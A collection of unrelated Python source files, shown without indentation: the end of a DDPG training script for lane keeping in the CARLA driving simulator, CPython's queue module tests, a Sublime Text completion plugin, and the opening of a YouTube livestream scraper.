## put the memory in pooling
for c_img_state, c_action, n_img_state, c_r, end_f in zip(current_img_state,current_action,
next_img_state, r_s, end):
if c_r > 0:
c = 1
else:
c = 0
memory_pool.put(memory=[c_img_state.astype(np.float32), c_action, n_img_state.astype(np.float32),
c_r, end_f], class_index=c)
if begin and memory_pool.capacity_bigger_than(val=190) and memory_pool.is_balance():
begin = False
online_begin_signal.set()
current_step = sess.run(global_step)
# print(memory_pool.get_propotion())
if FLAGS.log_every_n_steps != None:
## caculate average loss ##
step = current_step % FLAGS.log_every_n_steps
avg_r = (avg_r * step + np.mean(np.array(r_s))) / (step + 1.)
if step == FLAGS.log_every_n_steps - 1:
logger.info('Step-%s:Reward:%s' % (str(current_step), str(round(avg_r,3))))
def online_thread(sess, online_begin_signal):
"""update the online net thread"""
online_begin_signal.wait()
logger.info('Begin online nets...')
avg_loss = 0.
while True:
#### prepare memory data ####
batch_memorys = memory_pool.get(batch_size=FLAGS.batch_size)
## calculate the norm_rewards and replace raw rewards with them.
# raw_rewards = [m[3] for m in batch_memorys]
# r = rl_tools.normalize_rewards(raw_rewards)
# rl_tools.replace(batch_memorys, r)
current_img_state = []
current_action = []
next_img_state = []
current_reward = []
end_flag = []
for a_memory in batch_memorys:
current_img_state.append(a_memory[0])
current_action.append(a_memory[1])
next_img_state.append(a_memory[2])
current_reward.append(a_memory[3])
end_flag.append(a_memory[4])
current_img_state = np.array(current_img_state)
current_action = np.array(current_action)
next_img_state = np.array(next_img_state)
current_reward = np.array(current_reward)
end_flag = np.array(end_flag)
# print(current_reward[:10])
## update the Online Critic Q(s,a) ##
up, q_l = sess.run([online_critic_update, q_loss], feed_dict={reward: current_reward, whether_end: end_flag, target_img_state: next_img_state,
online_img_state: current_img_state, lr:FLAGS.critic_learning_rate})
## update the Online Actor π(s) ##
sess.run([online_actor_update], feed_dict={online_img_state: current_img_state, lr:FLAGS.actor_learning_rate})
## update steer action ##
# sess.run(online_actor_steer_update, feed_dict={online_action: current_action, online_img_state: current_state, std_steer: std_steer_ops,
# lr:80.*FLAGS.learning_rate})
## soft update the Online nets to Target nets
sess.run([actor_soft_copy_ops, critic_soft_copy_ops])
# logger.info('ones')
current_step = sess.run(global_step)
if FLAGS.log_every_n_steps != None:
## caculate average loss ##
step = current_step % FLAGS.log_every_n_steps
avg_loss = (avg_loss * step + q_l) / (step + 1.)
if step == FLAGS.log_every_n_steps - 1:
logger.info('Step-%s:Q_loss:%s' % (str(current_step), str(round(avg_loss, 3))))
if FLAGS.f_save_step != None:
if current_step % FLAGS.f_save_step == FLAGS.f_save_step - 1:
print(memory_pool.get_propotion())
## save model ##
logger.info('Saving model...')
model_name = os.path.join(FLAGS.train_dir, 'ddpg_keep_lane')
saver.save(sess, model_name, global_step=current_step)
logger.info('Save model sucess...')
if __name__ == '__main__':
########################### TENSORFLOW GRAPH ######################################
logger.info('Tensorflow graph buliding...')
## target input ##
target_img_state = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# target_action = tf.placeholder(shape=[None, 1], dtype=tf.float32) ## steer, accel, brake
## online input ##
online_img_state = tf.placeholder(shape=[None, 224, 224, 3], dtype=tf.float32)
# online_action = tf.placeholder(shape=[None, 1], dtype=tf.float32)
## other input ##
reward = tf.placeholder(shape=[None], dtype=tf.float32)
whether_end = tf.placeholder(shape=[None], dtype=tf.float32) ##True is end ,False is continue
lr = tf.placeholder(dtype=tf.float32)
global_step = tf.Variable(0, trainable=False, name='global_step')
gamma = 0.98 ##for gamma discount reward
tau = 1e-3 ##for soft update
## action range config ##
action_range = [[-1.,1.]] ## steer
###############
## target AC ##
###############
target_actor = ddpg.actor()
action_target, target_actor_vars = target_actor.build_graph(img_state=target_img_state, n_action_space=1, is_training=True,
action_range=action_range, var_scope='target_actor')
target_critic = ddpg.critic(max_abs_q_val=40)
q_target, target_critic_vars = target_critic.build_graph(img_state=target_img_state, action=action_target, is_training=True,
var_scope='target_critic')
###############
## online AC ##
###############
online_actor = ddpg.actor()
action_online, online_actor_vars = online_actor.build_graph(img_state=online_img_state, n_action_space=1, is_training=True,
action_range=action_range, var_scope='online_actor')
online_critic = ddpg.critic(max_abs_q_val=40)
q_online, online_critic_vars = online_critic.build_graph(img_state=online_img_state, action=action_online, is_training=True,
var_scope='online_critic')
###################################
### hard copy ops for first init###
###################################
actor_hard_copy_ops = rl_tools.copy_a2b(online_actor_vars, target_actor_vars)
critic_hard_copy_ops = rl_tools.copy_a2b(online_critic_vars, target_critic_vars)
###################
### soft update ###
###################
actor_soft_copy_ops = rl_tools.soft_copy_a2b(online_actor_vars, target_actor_vars)
critic_soft_copy_ops = rl_tools.soft_copy_a2b(online_critic_vars, target_critic_vars)
# #####################################
# ## an ops for online actor update ##
# #####################################
# take_action_ops = online_action.assign(action_online)
###############
## optimizer ##
###############
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
target_actor_bn_ops = []
target_critic_bn_ops = []
online_actor_bn_ops = []
online_critic_bn_ops = []
for update_op in update_ops:
if update_op.name.startswith('target_actor'):
target_actor_bn_ops.append(update_op)
elif update_op.name.startswith('target_critic'):
target_critic_bn_ops.append(update_op)
elif update_op.name.startswith('online_actor'):
online_actor_bn_ops.append(update_op)
elif update_op.name.startswith('online_critic'):
online_critic_bn_ops.append(update_op)
####################################
### Onlien Critic Q(s,a) update ####
####################################
"""
sess.run(online_critic_update, feed_dict={reward:(from memory), whether_end:(from memory), target_state:(next_state),
target_action:(next_action from target_actor(next_state)), online_state:(current_state), online_action:(current_action)})
"""
online_critic_update_ops = target_critic_bn_ops + online_critic_bn_ops
with tf.control_dependencies(online_critic_update_ops):
optimizer_for_online_critic = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
q_loss = tf.reduce_mean(tf.abs(reward + (1.-whether_end)*gamma*q_target - q_online))
q_gradients_vars = optimizer_for_online_critic.compute_gradients(q_loss, var_list=online_critic_vars)
capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in q_gradients_vars] ## clip the gradients
online_critic_update = optimizer_for_online_critic.apply_gradients(capped_gvs)
#################################
### Online Actor π(s) update ####
#################################
"""
sess.run(online_actor_update, feed_dict={online_action:(current_action), online_state:(current_state)})
"""
online_actor_update_ops = online_critic_bn_ops + online_actor_bn_ops
with tf.control_dependencies(online_actor_update_ops):
optimizer_for_online_actor = tf.train.AdamOptimizer(learning_rate=lr, epsilon=1e-8)
# q_a_gradients = tf.gradients(q_online, online_action)[0]
# determinstic_policy_gradients_vars = optimizer_for_online_actor.compute_gradients(tf.reduce_mean(-action_online*q_a_gradients), online_actor_vars)
q_val = tf.reduce_mean(-q_online)
determinstic_policy_gradients_vars = optimizer_for_online_actor.compute_gradients(q_val, online_actor_vars)
capped_gvs = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in determinstic_policy_gradients_vars] ## clip the gradients
online_actor_update = optimizer_for_online_actor.apply_gradients(capped_gvs, global_step=global_step)
##########################
### init, saver, ckpt ####
##########################
init = tf.global_variables_initializer()
saver = tf.train.Saver(tf.global_variables(), max_to_keep=5)
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
imitator_ckpt = tf.train.get_checkpoint_state(FLAGS.imitator_checkpoint_dir)
logger.info('Tensorflow graph bulid success...')
logger.info('Total trainable parameters:%s' %
str(np.sum([np.prod(v.get_shape().as_list()) for v in tf.trainable_variables()])))
imitator_train_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
scope="online_actor.+") ##filter the refine model's vars
imitator_restore_saver = tf.train.Saver(imitator_train_vars)
########################### TENSORFLOW GRAPH ######################################
#### carla world init ####
client = carla.Client('127.0.0.1', 2000)
client.set_timeout(10.0) # seconds
logger.info('Carla connect success...')
logger.info('Carla world initing...')
world = client.get_world()
destroy_all_actors(world)
## spawn vehicles in carla world
spawn_vehicles(world, n_autopilots=0, n_egopilots=FLAGS.n_egopilots)
time.sleep(2) ## sometimes unstale
autopilots = get_all_autopilots(world)
egopilots = get_all_egopilots(world)
cameras = []
lane_invasions = []
obj_collisions = []
# obstacle_aheads = []
logger.info('Adding some sensors to egopilots...')
for egopilot in egopilots:
## attach a camera to egopilot ##
# semantic_camera_config['attach_to'] = egopilot
# semantic_sensor = semantic_camera(world, semantic_camera_config)
# cameras.append(semantic_sensor)
bgr_camera_config['attach_to'] = egopilot
bgr_sensor = bgr_camera(world, bgr_camera_config)
cameras.append(bgr_sensor)
## attach collision sensor to egopilot ##
collision_sensor_config['attach_to'] = egopilot
collision_sensor = collision_query(world, collision_sensor_config)
obj_collisions.append(collision_sensor)
## attach line invasion sensor to egopilot ##
invasion_sensor_config['attach_to'] = egopilot
lane_invasion_sensor = lane_invasion_query(world, invasion_sensor_config)
lane_invasions.append(lane_invasion_sensor)
# ## attach obstacle sensor to egopilot
# obstacle_sensor_config['attach_to'] = egopilot
# obstacle_sensor = obstacle_ahead_query(world, obstacle_sensor_config)
# obstacle_aheads.append(obstacle_sensor)
logger.info('Adding some sensors to egopilots success')
memory_pool = rl_tools.balance_memory_pooling(max_capacity=200, n_class=2)
online_begin_signal = threading.Event()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
if ckpt:
logger.info('loading %s...' % str(ckpt.model_checkpoint_path))
saver.restore(sess, ckpt.model_checkpoint_path)
logger.info('Load checkpoint success...')
else:
sess.run(init)
if imitator_ckpt:
imitator_restore_saver.restore(sess, imitator_ckpt.model_checkpoint_path)
logger.info('load base imitator success...')
sess.run([actor_hard_copy_ops, critic_hard_copy_ops])
logger.info('DDPG all network variables init success...')
check_t = threading.Thread(target=check_whether_respawn_actors, args=(world, autopilots + egopilots,))
target_t = threading.Thread(target=target_thread, args=(sess, online_begin_signal,))
# respwan_v_t = threading.Thread(target=respwan_vehicles_in_traffic_light)
online_t = threading.Thread(target=online_thread, args=(sess, online_begin_signal,))
# target_t.daemon = True
# check_t.daemon = True
# online_t.daemon = True
check_t.start()
# respwan_v_t.start()
target_t.start()
online_t.start()
while True:
pass
|
test_queue.py
|
# Some simple queue module tests, plus some failure conditions
# to ensure the Queue locks remain stable.
import queue
import time
import unittest
from test import support
threading = support.import_module('threading')
QUEUE_SIZE = 5
def qfull(q):
return q.maxsize > 0 and q.qsize() == q.maxsize
# A thread to run a function that unclogs a blocked Queue.
class _TriggerThread(threading.Thread):
def __init__(self, fn, args):
self.fn = fn
self.args = args
self.startedEvent = threading.Event()
threading.Thread.__init__(self)
def run(self):
# The sleep isn't necessary, but is intended to give the blocking
# function in the main thread a chance at actually blocking before
# we unclog it. But if the sleep is longer than the timeout-based
# tests wait in their blocking functions, those tests will fail.
# So we give them much longer timeout values compared to the
# sleep here (I aimed at 10 seconds for blocking functions --
# they should never actually wait that long - they should make
# progress as soon as we call self.fn()).
time.sleep(0.1)
self.startedEvent.set()
self.fn(*self.args)
# Execute a function that blocks, and in a separate thread, a function that
# triggers the release. Returns the result of the blocking function. Caution:
# block_func must guarantee to block until trigger_func is called, and
# trigger_func must guarantee to change queue state so that block_func can make
# enough progress to return. In particular, a block_func that just raises an
# exception regardless of whether trigger_func is called will lead to
# timing-dependent sporadic failures, and one of those went rarely seen but
# undiagnosed for years. Now block_func must be unexceptional. If block_func
# is supposed to raise an exception, call do_exceptional_blocking_test()
# instead.
class BlockingTestMixin:
def do_blocking_test(self, block_func, block_args, trigger_func, trigger_args):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
self.result = block_func(*block_args)
# If block_func returned before our thread made the call, we failed!
if not self.t.startedEvent.is_set():
self.fail("blocking function '%r' appeared not to block" %
block_func)
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
return self.result
# Call this instead if block_func is supposed to raise an exception.
def do_exceptional_blocking_test(self,block_func, block_args, trigger_func,
trigger_args, expected_exception_class):
self.t = _TriggerThread(trigger_func, trigger_args)
self.t.start()
try:
try:
block_func(*block_args)
except expected_exception_class:
raise
else:
self.fail("expected exception of kind %r" %
expected_exception_class)
finally:
self.t.join(10) # make sure the thread terminates
if self.t.is_alive():
self.fail("trigger function '%r' appeared to not return" %
trigger_func)
if not self.t.startedEvent.is_set():
self.fail("trigger thread ended but event never set")
class BaseQueueTest(unittest.TestCase, BlockingTestMixin):
def setUp(self):
self.cum = 0
self.cumlock = threading.Lock()
def simple_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
self.assertTrue(q.empty())
self.assertFalse(q.full())
# I guess we better check things actually queue correctly a little :)
q.put(111)
q.put(333)
q.put(222)
target_order = dict(Queue = [111, 333, 222],
LifoQueue = [222, 333, 111],
PriorityQueue = [111, 222, 333])
actual_order = [q.get(), q.get(), q.get()]
self.assertEqual(actual_order, target_order[q.__class__.__name__],
"Didn't seem to queue the correct data!")
for i in range(QUEUE_SIZE-1):
q.put(i)
self.assertTrue(q.qsize(), "Queue should not be empty")
self.assertTrue(not qfull(q), "Queue should not be full")
last = 2 * QUEUE_SIZE
full = 3 * 2 * QUEUE_SIZE
q.put(last)
self.assertTrue(qfull(q), "Queue should be full")
self.assertFalse(q.empty())
self.assertTrue(q.full())
try:
q.put(full, block=0)
self.fail("Didn't appear to block with a full queue")
except queue.Full:
pass
try:
q.put(full, timeout=0.01)
self.fail("Didn't appear to time-out with a full queue")
except queue.Full:
pass
# Test a blocking put
self.do_blocking_test(q.put, (full,), q.get, ())
self.do_blocking_test(q.put, (full, True, 10), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
try:
q.get(block=0)
self.fail("Didn't appear to block with an empty queue")
except queue.Empty:
pass
try:
q.get(timeout=0.01)
self.fail("Didn't appear to time-out with an empty queue")
except queue.Empty:
pass
# Test a blocking get
self.do_blocking_test(q.get, (), q.put, ('empty',))
self.do_blocking_test(q.get, (True, 10), q.put, ('empty',))
def worker(self, q):
while True:
x = q.get()
if x < 0:
q.task_done()
return
with self.cumlock:
self.cum += x
q.task_done()
def queue_join_test(self, q):
self.cum = 0
for i in (0,1):
threading.Thread(target=self.worker, args=(q,)).start()
for i in range(100):
q.put(i)
q.join()
self.assertEqual(self.cum, sum(range(100)),
"q.join() did not block until all tasks were done")
for i in (0,1):
q.put(-1) # instruct the threads to close
q.join() # verify that you can join twice
def test_queue_task_done(self):
# Test to make sure a queue task completed successfully.
q = self.type2test()
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_queue_join(self):
# Test that a queue join()s successfully, and before anything else
# (done twice for insurance).
q = self.type2test()
self.queue_join_test(q)
self.queue_join_test(q)
try:
q.task_done()
except ValueError:
pass
else:
self.fail("Did not detect task count going negative")
def test_simple_queue(self):
# Do it a couple of times on the same queue.
# Done twice to make sure works with same instance reused.
q = self.type2test(QUEUE_SIZE)
self.simple_queue_test(q)
self.simple_queue_test(q)
def test_negative_timeout_raises_exception(self):
q = self.type2test(QUEUE_SIZE)
with self.assertRaises(ValueError):
q.put(1, timeout=-1)
with self.assertRaises(ValueError):
q.get(1, timeout=-1)
def test_nowait(self):
q = self.type2test(QUEUE_SIZE)
for i in range(QUEUE_SIZE):
q.put_nowait(1)
with self.assertRaises(queue.Full):
q.put_nowait(1)
for i in range(QUEUE_SIZE):
q.get_nowait()
with self.assertRaises(queue.Empty):
q.get_nowait()
def test_shrinking_queue(self):
# issue 10110
q = self.type2test(3)
q.put(1)
q.put(2)
q.put(3)
with self.assertRaises(queue.Full):
q.put_nowait(4)
self.assertEqual(q.qsize(), 3)
q.maxsize = 2 # shrink the queue
with self.assertRaises(queue.Full):
q.put_nowait(4)
class QueueTest(BaseQueueTest):
type2test = queue.Queue
class LifoQueueTest(BaseQueueTest):
type2test = queue.LifoQueue
class PriorityQueueTest(BaseQueueTest):
type2test = queue.PriorityQueue
# A Queue subclass that can provoke failure at a moment's notice :)
class FailingQueueException(Exception):
pass
class FailingQueue(queue.Queue):
def __init__(self, *args):
self.fail_next_put = False
self.fail_next_get = False
queue.Queue.__init__(self, *args)
def _put(self, item):
if self.fail_next_put:
self.fail_next_put = False
raise FailingQueueException("You Lose")
return queue.Queue._put(self, item)
def _get(self):
if self.fail_next_get:
self.fail_next_get = False
raise FailingQueueException("You Lose")
return queue.Queue._get(self)
class FailingQueueTest(unittest.TestCase, BlockingTestMixin):
def failing_queue_test(self, q):
if q.qsize():
raise RuntimeError("Call this function with an empty queue")
for i in range(QUEUE_SIZE-1):
q.put(i)
# Test a failing non-blocking put.
q.fail_next_put = True
try:
q.put("oops", block=0)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.fail_next_put = True
try:
q.put("oops", timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a failing blocking put
q.fail_next_put = True
try:
self.do_blocking_test(q.put, ("full",), q.get, ())
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
# Test a failing timeout put
q.fail_next_put = True
try:
self.do_exceptional_blocking_test(q.put, ("full", True, 10), q.get, (),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# Check the Queue isn't damaged.
# put failed, but get succeeded - re-add
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
q.get()
self.assertTrue(not qfull(q), "Queue should not be full")
q.put("last")
self.assertTrue(qfull(q), "Queue should be full")
# Test a blocking put
self.do_blocking_test(q.put, ("full",), q.get, ())
# Empty it
for i in range(QUEUE_SIZE):
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.put("first")
q.fail_next_get = True
try:
q.get()
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.fail_next_get = True
try:
q.get(timeout=0.1)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
q.fail_next_get = True
try:
self.do_exceptional_blocking_test(q.get, (), q.put, ('empty',),
FailingQueueException)
self.fail("The queue didn't fail when it should have")
except FailingQueueException:
pass
# put succeeded, but get failed.
self.assertTrue(q.qsize(), "Queue should not be empty")
q.get()
self.assertTrue(not q.qsize(), "Queue should be empty")
def test_failing_queue(self):
# Test to make sure a queue is functioning correctly.
# Done twice to the same instance.
q = FailingQueue(QUEUE_SIZE)
self.failing_queue_test(q)
self.failing_queue_test(q)
def test_main():
support.run_unittest(QueueTest, LifoQueueTest, PriorityQueueTest,
FailingQueueTest)
if __name__ == "__main__":
test_main()
|
plugin.py
|
import sys
import re
import time
try:
import completion.jsonrpc as jsonrpc
except:
import jsonrpc
import sublime
import sublime_plugin
import subprocess
import threading
import os
import os.path
import signal
def log(a):
settings = sublime.load_settings("completion.sublime-settings")
if settings.get("debug", False):
print(a)
def make_transport():
settings = sublime.load_settings("completion.sublime-settings")
proto = settings.get("proto", "unix")
tp = jsonrpc.TransportUnixSocket
port = settings.get("port", os.path.join(sublime.packages_path(), "User", "completion.rpc"))
if proto == "tcp":
tp = jsonrpc.TransportTcpIp
elif proto == "unix":
if not os.path.exists(port):
start_daemon()
return tp(addr=port, logfunc=log, timeout=2.0)
def make_proxy():
global proxy
proxy = jsonrpc.ServerProxy(jsonrpc.JsonRpc10(),make_transport())
proxy = None
language_regex = re.compile("(?<=source\.)[\w+#]+")
daemon = None
last_launch = None
def pipe_reader(name, pipe, output=False):
global daemon
while True and daemon != None:
try:
line = pipe.readline()
if len(line) == 0:
break
if output:
log("%s: %s" % (name, line))
except:
traceback.print_exc()
break
daemon = None
def start_daemon(daemon_command=None):
global daemon
global last_launch
if daemon_command == None:
settings = sublime.load_settings("completion.sublime-settings")
daemon_command = settings.get("daemon_command")
now = time.time()
output = False
if last_launch != None and (now - last_launch) < 5:
# Last tried to launch 5 seconds ago, enable debug output in the
# pipe threads
output = True
last_launch = now
daemon = subprocess.Popen(daemon_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=pipe_reader, args=("stdout", daemon.stdout,output,))
t.start()
t = threading.Thread(target=pipe_reader, args=("stderr", daemon.stderr,output,))
t.start()
def plugin_unloaded():
global daemon
if daemon != None:
daemon.send_signal(signal.SIGINT)
time.sleep(2)
daemon.kill()
daemon = None
def do_query(context, callback, driver, args, launch_daemon, daemon_command, debug=False):
for i in range(2):
# The reason for the loop here is to try and start the daemon if it wasn't running and the user settings allows this
s = time.time()
try:
response = driver.CompleteAt(args)
break
except jsonrpc.RPCFault as e:
print(e.error_data)
return
except jsonrpc.RPCTransportError as e2:
if daemon == None and launch_daemon:
start_daemon(daemon_command)
else:
return
e = time.time()
print("Perform: %f ms" % ((e - s) * 1000))
s = time.time()
completions = []
if debug:
print("response:", response)
def relname(dict):
return dict["Relative"] if "Relative" in dict else ""
if "Methods" in response:
for m in response["Methods"]:
n = m["Name"]["Relative"] + "("
ins = n
res = n
if "Parameters" in m:
c = 1
for p in m["Parameters"]:
if c > 1:
ins += ", "
res += ", "
tn = relname(p["Type"]["Name"])
vn = relname(p["Name"])
ins += "${%d:%s %s}" % (c, tn, vn)
res += "%s %s" % (tn, vn)
c += 1
ins += ")"
res += ")"
if "Returns" in m:
# TODO: multiple returns
res += "\t" + relname(m["Returns"][0]["Type"]["Name"])
completions.append((res, ins))
if "Fields" in response:
for f in response["Fields"]:
tn = relname(f["Type"]["Name"])
vn = relname(f["Name"])
ins = "%s" % (vn)
res = "%s\t%s" % (vn, tn)
completions.append((res, ins))
if "Types" in response:
# TODO: "Types"
print(response["Types"])
e = time.time()
print("Post processing: %f ms" % ((e - s) * 1000))
if debug:
print(completions)
callback(context, completions)
def get_language(view, caret):
language = language_regex.search(view.scope_name(caret))
if language == None:
return None
return language.group(0)
def prepare_request(view, prefix, locations, settings):
if proxy == None:
make_proxy()
s = time.time()
row, col = view.rowcol(locations[0])
# TODO: detecting which "driver" is to be used should at some point be possible (but not required) to delegate to the server
drivers = {
"c++": "Clang",
"c": "Clang",
"java": "Java",
"cs": "Net"
}
lang = get_language(view, locations[0])
if not lang in drivers:
return (None, None)
else:
driver = getattr(proxy, drivers[lang])
# TODO: Make the request async
args = {
"Location": {
"File": {
"Name": view.file_name(),
},
"Column": col + 1,
"Line": row + 1
},
"SessionOverrides": {
# TODO: what would be a good way to handle this? Query the "driver" for which options are configurable?
# TODO: Sessions should be used when possible to avoid sending the same configuration all the time.
"compiler_flags": view.settings().get("sublimeclang_options", []),
"net_paths":view.settings().get("net_paths", []),
"net_assemblies":view.settings().get("net_assemblies", []),
}
}
if view.is_dirty():
args["Location"]["File"]["Contents"] = view.substr(sublime.Region(0, view.size()))
e = time.time()
print("Prepare: %f ms" % ((e - s) * 1000))
return (driver, args)
def get_context(view, prefix, locations):
return "%s:%s" % (view.file_name(), locations[0]-len(prefix))
def exec_goto(driver, args):
response = driver.GetDefinition(args)
try:
sublime.active_window().open_file("%s:%d:%d" % (response["File"]["Name"], response["Line"], response["Column"]), sublime.ENCODED_POSITION|sublime.TRANSIENT)
except:
sublime.status_message("definition not found!")
print(response)
class CompletionGotoDefinitionCommand(sublime_plugin.TextCommand):
def __init__(self, view):
self.view = view
def run(self, edit):
settings = sublime.load_settings("completion.sublime-settings")
launch_daemon = settings.get("launch_daemon", False)
daemon_command = settings.get("daemon_command")
debug = settings.get("debug", False)
locations = [a.b for a in self.view.sel()]
prefix = self.view.substr(self.view.word(locations[0]))
driver, args = prepare_request(self.view, prefix, locations, settings)
if driver == None or args == None:
return
args["Identifier"] = prefix
sublime.status_message("looking for definition of %s" % prefix)
t = threading.Thread(target=exec_goto, args=(driver, args))
t.start()
class Ev(sublime_plugin.EventListener):
def __init__(self):
self.request_context = None
self.response_context = None
self.response = None
def got_response(self, context, completions):
if self.request_context != context:
print("Context out of date.. Discarding.")
return
self.response_context = context
self.response = completions
if len(completions) != 0:
sublime.set_timeout(self.hack)
def hack(self):
sublime.active_window().run_command("hide_auto_complete")
def hack2():
sublime.active_window().run_command("auto_complete")
sublime.set_timeout(hack2, 1)
def on_query_completions(self, view, prefix, locations):
context = get_context(view, prefix, locations)
if self.response_context == context:
# Have a finished response from before
return self.response
elif self.request_context == context:
# Currently being processed already...
return
# No active query or the context of the current query is not what we want.
# Start a new request.
self.request_context = context
settings = sublime.load_settings("completion.sublime-settings")
launch_daemon = settings.get("launch_daemon", False)
daemon_command = settings.get("daemon_command")
debug = settings.get("debug", False)
driver, args = prepare_request(view, prefix, locations, settings)
if driver == None or args == None:
return
t = threading.Thread(target=do_query, args=(context, self.got_response, driver, args, launch_daemon, daemon_command, debug))
t.start()
|
scraper_oo.py
|
#!/usr/bin/env python3
from bs4 import BeautifulSoup
import os
import subprocess
import sys
import json
import multiprocessing as mp
import datetime as dt
import time
import traceback
import signal
from chat_downloader import ChatDownloader
from chat_downloader.sites import YouTubeChatDownloader
from utils import extract_video_id_from_yturl
try:
from write_cgroup import write_cgroup
except ImportError:
def write_cgroup(mainpid):
pass
# Debug switch
DISABLE_PERSISTENCE = False
FORCE_RESCRAPE = False
SCRAPER_SLEEP_INTERVAL = 120 * 5 / 2
CHANNEL_SCRAPE_LIMIT = 30
downloadmetacmd = "../yt-dlp/yt-dlp.sh -s -q -j --ignore-no-formats-error "
downloadchatprgm = "../downloader.py"
channelscrapecmd = "../scrape_channel_oo.sh"
channelpostscrapecmd = "../scrape_community_tab.sh"
channelsfile = "./channels.txt"
watchdogprog = "../watchdog.sh"
holoscrapecmd = 'wget -nv --load-cookies=../cookies-schedule-hololive-tv.txt https://schedule.hololive.tv/lives -O auto-lives_tz'
# dict: video_id => Video
lives = {}
channels = {}
pids = {}
general_stats = {} # for debugging
statuses = {'unknown', 'prelive', 'live', 'postlive', 'upload'}
progress_statuses = {'unscraped', 'waiting', 'downloading', 'downloaded', 'missed', 'invalid', 'aborted'}
def get_timestamp_now():
return dt.datetime.utcnow().timestamp()
class TransitionException(Exception):
""" Invalid live status transition by setter """
pass
class Video:
""" Record the online status of a video, along with the scraper's download stage.
Metadata from Youtube is also stored when needed.
video_id is the unique Youtube ID for identifying a video.
"""
def __init__(self, video_id):
self.video_id = video_id
self.status = 'unknown'
self.progress = 'unscraped'
self.warned = False
self.init_timestamp = get_timestamp_now()
self.transition_timestamp = self.init_timestamp
self.meta_timestamp = None
# might delete one
self.meta = None
self.rawmeta = None
# might change
self.did_status_print = False
self.did_progress_print = False
self.did_discovery_print = False
self.did_meta_flush = False
def set_status(self, status: str):
""" Set the online status (live progress) of a video
Currently can be any of: 'unknown', 'prelive', 'live', 'postlive', 'upload'.
Invalid progress transtitions print a warning (except for 'unknown').
"""
if status not in statuses:
raise ValueError(f"tried to set invalid status: {status}")
if status == 'unknown':
raise TransitionException("status cannot be set to 'unknown', only using reset")
if status == 'prelive' and self.status in {'live', 'postlive', 'upload'} \
or status == 'live' and self.status in {'postlive', 'upload'} \
or status == 'postlive' and self.status in {'upload'}:
print(f"warning: new video status invalid: transitioned from {self.status} to {status}", file=sys.stderr)
self.warned = True
if status == 'postlive' and self.status in {'prelive'}:
print(f"warning: new video status suspicious: transitioned from {self.status} to {status}", file=sys.stderr)
self.warned = True
if status == self.status:
print(f"warning: new video status suspicious: no change in status: {status}", file=sys.stderr)
self.warned = True
else:
self.did_status_print = False
self.did_meta_flush = False
self.transition_timestamp = get_timestamp_now()
self.status = status
def set_progress(self, progress: str):
""" Set the scraper progress of a video
Currently can be any of: 'unscraped', 'waiting', 'downloading', 'downloaded', 'missed', 'invalid', 'aborted'
Invalid progress transtitions throw a TransitionException.
"""
if progress not in progress_statuses:
raise ValueError(f"tried to set invalid progress status: {progress}")
if progress == 'unscraped':
raise TransitionException("progress cannot be set to 'unscraped', only using reset")
if progress == 'waiting' and self.progress != 'unscraped' \
or progress == 'downloading' and self.progress != 'waiting' \
or progress == 'downloaded' and self.progress != 'downloading' \
or progress == 'missed' and self.progress not in {'unscraped', 'waiting'} \
or progress == 'invalid' and self.progress != 'unscraped' \
or progress == 'aborted' and self.progress == 'downloaded':
raise TransitionException(f"progress cannot be set to {progress} from {self.progress}")
if progress == self.progress:
print(f"warning: new progress status suspicious: no change in progress: {progress}", file=sys.stderr)
self.warned = True
else:
self.did_progress_print = False
self.did_meta_flush = False
self.transition_timestamp = get_timestamp_now()
self.progress = progress
def reset_status(self):
""" Set the status to 'unknown'. Useful for clearing state loaded from disk. """
self.status = 'unknown'
def reset_progress(self):
""" Set progress to 'unscraped'. Useful for clearing state loaded from disk. """
self.progress = 'unscraped'
def prepare_meta(self):
""" Load meta from disk or fetch it from YouTube. """
# NOTE: Currently unused.
if self.meta is None:
rescrape(self)
self.rawmeta = self.meta.get('raw')
if self.rawmeta:
del self.meta['raw']
self.meta_timestamp = get_timestamp_now()
def rescrape_meta(self):
""" Ignore known meta and fetch meta from YouTube. """
lastmeta = self.meta
self.meta = None
try:
rescrape(self)
except Exception:
self.meta = lastmeta
if self.meta:
rawmeta = self.meta.get('raw')
if rawmeta:
self.rawmeta = rawmeta
del self.meta['raw']
# Avoid a case where failing meta scrapes kept flushing.
is_simple = self.meta is not None and self.rawmeta is None
if not is_simple or self.meta != lastmeta:
self.meta_timestamp = get_timestamp_now()
self.did_meta_flush = False
class Channel:
""" Tracks basic details about a channel, such as the videos that belong to it. """
def __init__(self, channel_id):
self.channel_id = channel_id
self.videos = set()
self.init_timestamp = get_timestamp_now()
self.modify_timestamp = self.init_timestamp
self.did_discovery_print = False
self.batching = False
self.batch = None
def add_video(self, video: Video):
""" Add a video to our list, and possibly our current batch
Modifies timestamp on success
"""
